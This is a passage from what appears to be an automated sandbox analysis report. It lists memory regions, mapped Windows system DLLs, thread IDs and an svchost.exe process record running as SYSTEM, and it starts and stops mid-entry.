0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 427 start_va = 0x240000 end_va = 0x250fff entry_point = 0x240000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 428 start_va = 0x260000 end_va = 0x263fff entry_point = 0x260000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 429 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 430 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 431 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 432 start_va = 0x480000 end_va = 0x480fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 433 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 434 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 435 start_va = 0x630000 end_va = 0x7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 436 start_va = 0x7c0000 end_va = 0xbb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 437 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 438 start_va = 0xc20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 439 start_va = 0xd00000 end_va = 0xd7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 440 start_va = 0xd80000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 441 start_va = 0xe70000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 442 start_va = 0xef0000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 443 start_va = 0xf70000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 444 start_va = 0x1080000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 445 start_va = 0x10a0000 end_va = 0x136efff entry_point = 0x10a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 446 start_va = 0x1370000 end_va = 0x146ffff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 447 start_va = 0x1470000 end_va = 0x156ffff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 448 start_va = 0x1600000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 449 start_va = 0x16b0000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 450 start_va = 0x1790000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x0000000001790000" filename = "" Region: id = 451 start_va = 0x1870000 end_va = 0x18effff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 452 start_va = 0x1930000 end_va = 0x193ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 453 start_va = 0x1960000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 454 start_va = 0x1aa0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 455 start_va = 0x1bb0000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001bb0000" filename = "" Region: id = 456 start_va = 0x1bc0000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 457 start_va = 0x1c40000 end_va = 0x1cbffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 458 start_va = 0x1cc0000 end_va = 0x1d7ffff entry_point = 0x1cc0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 459 start_va = 0x1db0000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 460 start_va = 0x1eb0000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 461 start_va = 0x1f30000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 462 start_va = 0x1fb0000 end_va = 0x21affff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 463 start_va = 0x2230000 end_va = 0x22affff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 464 start_va = 0x23b0000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 465 start_va = 0x73f90000 end_va = 0x73f92fff entry_point = 0x73f90000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 466 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 467 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 468 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 469 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 470 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 471 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 472 start_va = 0xfff20000 end_va = 0xfff2afff entry_point = 0xfff20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 473 start_va = 0x7fef4b90000 end_va = 0x7fef4ba7fff entry_point = 0x7fef4b90000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 474 start_va = 0x7fef4bb0000 end_va = 0x7fef4c0ffff entry_point = 0x7fef4bb0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 475 start_va = 0x7fef69e0000 end_va = 0x7fef69ebfff entry_point = 0x7fef69e0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 476 start_va = 0x7fef6a30000 end_va = 0x7fef6b07fff entry_point = 0x7fef6a30000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 477 start_va = 0x7fef6d60000 end_va = 0x7fef6d67fff entry_point = 0x7fef6d60000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 478 start_va = 0x7fef6d70000 end_va = 0x7fef6de3fff entry_point = 0x7fef6d70000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 479 start_va = 0x7fef7b60000 end_va = 0x7fef7b78fff entry_point = 0x7fef7b60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 480 start_va = 0x7fef7b80000 end_va = 0x7fef7b8ffff entry_point = 0x7fef7b80000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 481 start_va = 0x7fef7b90000 end_va = 0x7fef7ba1fff entry_point = 0x7fef7b90000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 482 start_va = 0x7fef7d00000 end_va = 0x7fef7d63fff entry_point = 0x7fef7d00000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 483 start_va = 0x7fef7d70000 end_va = 0x7fef7de0fff entry_point = 0x7fef7d70000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 484 start_va = 0x7fef8860000 end_va = 0x7fef88dbfff entry_point = 0x7fef8860000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 485 start_va = 0x7fefaef0000 end_va = 0x7fefaf07fff entry_point = 0x7fefaef0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 486 start_va = 0x7fefaf10000 end_va = 0x7fefaf20fff entry_point = 0x7fefaf10000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 487 start_va = 0x7fefafe0000 end_va = 0x7fefb032fff entry_point = 0x7fefafe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 488 start_va = 0x7fefb110000 end_va = 0x7fefb119fff entry_point = 0x7fefb110000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 489 start_va = 0x7fefb130000 end_va = 0x7fefb13afff entry_point = 0x7fefb130000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 490 start_va = 0x7fefb140000 end_va = 0x7fefb166fff entry_point = 0x7fefb140000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 491 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 492 start_va = 0x7fefb240000 end_va = 0x7fefb24bfff entry_point = 0x7fefb240000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 493 start_va = 0x7fefb300000 end_va = 0x7fefb314fff entry_point = 0x7fefb300000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 494 start_va = 0x7fefb990000 end_va = 0x7fefb9a8fff entry_point = 0x7fefb990000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 495 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c4fff entry_point = 0x7fefb9b0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 496 start_va = 0x7fefba30000 end_va = 0x7fefba3afff entry_point = 0x7fefba30000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 497 start_va = 0x7fefbbb0000 end_va = 0x7fefbbc7fff entry_point = 0x7fefbbb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 498 start_va = 0x7fefc970000 end_va = 0x7fefc97bfff entry_point = 0x7fefc970000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 499 start_va = 0x7fefca40000 end_va = 0x7fefca46fff entry_point = 0x7fefca40000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 500 start_va = 0x7fefcb30000 end_va = 0x7fefcb4afff entry_point = 0x7fefcb30000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 501 start_va = 0x7fefcb50000 end_va = 0x7fefcb6dfff entry_point = 0x7fefcb50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 502 start_va = 0x7fefcca0000 end_va = 0x7fefcca9fff entry_point = 0x7fefcca0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 503 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 504 start_va = 0x7fefce90000 end_va = 0x7fefcebffff entry_point = 0x7fefce90000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 505 start_va = 0x7fefcec0000 end_va = 0x7fefcf1afff entry_point = 0x7fefcec0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 506 start_va = 0x7fefd030000 end_va = 0x7fefd036fff entry_point = 0x7fefd030000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 507 start_va = 0x7fefd040000 end_va = 0x7fefd094fff entry_point = 0x7fefd040000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 508 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 509 start_va = 0x7fefd340000 end_va = 0x7fefd353fff entry_point = 0x7fefd340000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 510 start_va = 0x7fefd640000 end_va = 0x7fefd64afff entry_point = 0x7fefd640000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 511 start_va = 0x7fefd670000 end_va = 0x7fefd694fff entry_point = 0x7fefd670000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 512 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 513 start_va = 0x7fefd6b0000 end_va = 0x7fefd740fff entry_point = 0x7fefd6b0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 514 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 515 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff entry_point = 0x7fefd7b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 516 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 517 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 518 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 519 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 520 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 521 start_va = 0x7fefdef0000 end_va = 0x7fefdef7fff entry_point = 0x7fefdef0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 522 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 523 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 524 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 525 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 526 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 527 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 528 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 529 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 530 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 531 start_va = 0x7feffb20000 end_va = 0x7feffb6cfff entry_point = 0x7feffb20000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 532 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 533 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 534 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 535 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 536 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 537 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 538 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 539 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 540 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 541 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 542 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 543 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 544 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 545 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 546 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 547 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 548 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 549 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 550 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Thread: id = 18 os_tid = 0x8ac Thread: id = 19 os_tid = 0x554 Thread: id = 20 os_tid = 0x6ec Thread: id = 21 os_tid = 0x730 Thread: id = 22 os_tid = 0x7ac Thread: id = 23 os_tid = 0x7a8 Thread: id = 24 os_tid = 0x780 Thread: id = 25 os_tid = 0x77c Thread: id = 26 os_tid = 0x758 Thread: id = 27 os_tid = 0x754 Thread: id = 28 os_tid = 0x61c Thread: id = 29 os_tid = 0x158 Thread: id = 30 os_tid = 0x154 Thread: id = 31 os_tid = 0x130 Thread: id = 32 os_tid = 0x12c Thread: id = 33 os_tid = 0x11c Thread: id = 42 os_tid = 0x54c Thread: id = 59 os_tid = 0x7f4 Thread: id = 64 os_tid = 0x8f4 Thread: id = 66 os_tid = 0x8e0 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x214f1000" os_pid = "0x9e0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0005361e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 554 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 555 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 556 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 557 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 558 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 559 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 560 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 561 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 562 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 563 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 564 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 565 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 566 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 567 start_va = 0x570000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 568 start_va = 0x600000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 569 start_va = 0x680000 end_va = 0x73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 570 start_va = 0x740000 end_va = 0x7bffff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 571 start_va = 0x7f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 572 start_va = 0x870000 end_va = 0xb3efff entry_point = 0x870000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 573 start_va = 0xb40000 end_va = 0xcc7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 574 start_va = 0xcd0000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 575 start_va = 0xe60000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 576 start_va = 0x1320000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 577 start_va = 0x77640000 end_va = 0x77739fff entry_point = 0x77640000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 578 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 579 start_va = 0x77860000 end_va = 